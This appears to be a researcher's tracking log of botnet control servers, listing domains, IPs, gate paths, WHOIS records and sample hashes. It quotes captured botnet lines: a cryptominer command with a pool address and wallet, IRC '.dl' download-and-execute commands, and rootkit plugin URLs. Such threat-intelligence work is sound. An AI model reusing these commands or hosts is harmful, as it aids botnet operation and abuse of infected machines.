Resolved sinsec.net to 37.221.170.96
Server: sinsec.net
Gate file: /turndown/order.php
Alternate domains: divinestresser.info radicalpkz.com perp.pw thefox.pw uploadme.pw perp.se
Domain info: sinsec.net
Domain Name: SINSEC.NET
Registry Domain ID: 1814650535_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.enom.com
Registrar URL: www.enom.com
Updated Date: 2013-07-12 10:27:24Z
Creation Date: 2013-07-12 17:27:00Z
Registrar Registration Expiration Date: 2014-07-12 17:27:00Z
Registrar: ENOM, INC.
Registrar IANA ID: 48

dayzstreaming.co.uk (Betabot http botnet hosted by alibabahost.com)
Resolved dayzstreaming.co.uk to 37.221.170.194
Server: dayzstreaming.co.uk
Gate file: /gato/order.php
Alternate domain: dayzstreaming.org.uk
Hosting info: http://whois.domaintools.com/37.221.170.194
Related md5s (Download sample from Malwr.com)
Betabot: c0d2e08c3f0d964858b8a9788aa6732e

haveityourway.pw (betabot http botnet hosted by Alibabahost.com)
Resolved haveityourway.pw to 103.31.187.77
Server: haveityourway.pw
Gate file: /members/order.php
Alternate domains (currently not registered): thebestway42.pw itsoktohaveityourway.com losmejoresburgers1.com
The first domain was only registered yesterday.
Hosting infos: http://whois.domaintools.com/103.31.187.77
Related md5s (Search on Malwr.com to download samples)
Betabot: 3b0907c7bf881f8f5f9fa2190384d3dd

kankarmz.ru (betabot http botnet hosted by Alibabahost.com)
Resolved kankarmz.ru to 37.221.170.35
Server: kankarmz.ru
Gate file: /Duf67/H8938_827.php
Alternate domains (both are currently unregistered): u023sjasj.net iodijsakj.net
This is one of only three or so betabots that I have seen rename the gate file from order.php to something less obvious. I guess that might be a bit too advanced for the average HF skid.
Hosting infos:

solutionswiki.com (Andromeda http botnet hosted by alibabahost.com)
Resolved solutionswiki.com to 109.163.233.107
Server: solutionswiki.com
Gate file: /pages/image.php
There is also a betabot hosted on the same domain.
Mining infos: dasHosts.exe -a scrypt-jane -o http://37.221.170.226:8344 -O YFicRwX9HpMkVovPPWG3NAJ9Tpom3YeXqC:x
Hosting infos: http://whois.domaintools.com/109.163.233.107

umadais.pw (Betabot http botnet hosted by alibabahost.com)
Resolved umadais.pw to 109.163.229.189
Server: umadais.pw
Gate file: /a/order.php
Alternate domains: yyaammppuu.pw blamaldo.pw
Hosting infos: http://whois.domaintools.com/109.163.229.189

solutionswiki.com (Betabot http botnet hosted by alibabahost.com)
Resolved solutionswiki.com to 109.163.233.107
Server: solutionswiki.com
Port: 4137
Gate file: /system/order.php
I don’t know why betabot owners keep putting their http servers on ports other than 80. Seems pretty dumb. I guess you can only expect so much from a HF bot and its owners.
Hosting infos: http://whois.domaintools.com/109.163.233.107

x01bkr2.biz (snk asper mod irc botnet hosted by buyurl.net, alibabahost.com)
Resolved x01bkr2.biz to 94.242.237.128, 37.221.170.208
Server: x01bkr2.biz
Port: 4723
Channel: #o.O
Topic for #o.O is: .dl hxxp://www.mediafire.com/download.php?dqr1p0wz8tpz9tz | .dl hxxp://www.mediafire.com/download.php?uqqhg3equchc7bd
Topic for #o.O set by SpliT at Sat Apr 27 17:57:29 2013
The skype spreader downloads messages from hxxp://waxortraxe.org/icon.jpg
Alternate domains: zr0x1b9.biz xkzykxb.biz xeyaz.biz
Hosting infos: http://whois.domaintools.com/94.242.237.128
Hosting infos: http://whois.domaintools.com/37.221.170.208
EDIT: snk is now desperately

firecrypt.net (Betabot http botnet hosted by alibabahost.com)
Resolved firecrypt.net to 37.221.165.124
Server: firecrypt.net
Gate file: /BetaBot/order.php
Alternate domains: rankedgaming.co iphone-giveaways.com
Hosting infos: http://whois.domaintools.com/37.221.165.124

kryptic.me (Andromeda http botnet hosted by alibabahost.com)
Resolved kryptic.me to 37.221.170.234
Server: kryptic.me
Gate file: /jackson/gate.php
Plugins
Rootkit: hxxp://krytical.me/jackson/plugins/rk_666604bd.mod
Alternate domain: krytical.me
http://whois.domaintools.com/37.221.170.234